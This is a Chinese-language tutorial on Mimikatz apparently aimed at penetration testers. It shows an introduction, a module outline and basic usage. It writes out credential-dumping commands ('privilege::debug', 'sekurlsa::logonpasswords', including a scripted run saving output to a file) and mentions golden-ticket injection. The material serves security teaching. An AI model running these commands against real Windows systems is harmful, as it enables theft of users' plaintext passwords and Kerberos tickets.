Mimikatz如何实现凭证窃取与明文密码提取?
摘要:以肉去蚁蚁愈多,以鱼驱蝇蝇愈至。 导航 1 工具介绍 2 基本用法 2.1 执行方式 2.2 帮助命令 3 模块用法 3.1 Standard 模块 3.2 Privilege 模块 3.3 Token 模块 3.4 SekurLSA 模块
以肉去蚁蚁愈多,以鱼驱蝇蝇愈至。
导航
1 工具介绍
2 基本用法
2.1 执行方式
2.2 帮助命令
3 模块用法
3.1 Standard 模块
3.2 Privilege 模块
3.3 Token 模块
3.4 SekurLSA 模块
3.5 LsaDump 模块
3.6 Kerberos 模块
3.7 Misc 模块
4 杂项
1、工具介绍
Mimikatz 是一款由法国安全研究员 Benjamin Delpy 编写的 Windows 安全工具,在渗透测试中被广泛用于密码提取、Kerberos 攻击、票据伪造、LSA dump 等工作。
2、基本用法
2.1、执行方式
Mimikatz 支持两种方式去执行命令,分别是:交互式、脚本式。虽然交互式中的命令总是可以转换为脚本式去执行,但也存在一些命令只能在交互式中去执行,而无法通过脚本式去执行。例如:金票伪造注入命令 Kerberos::golden ... /ptt 只能在交互式下执行,以脚本式执行时会报错运行失败。
(1)命令交互式执行如下:
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
exit
(2)命令脚本式执行如下:
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > pssword.txt
2.2、帮助命令
Mimikatz 内置的命令帮助手册并不好用,一些时候还是需要参考官方手册,尽管官方手册也并不太全面。
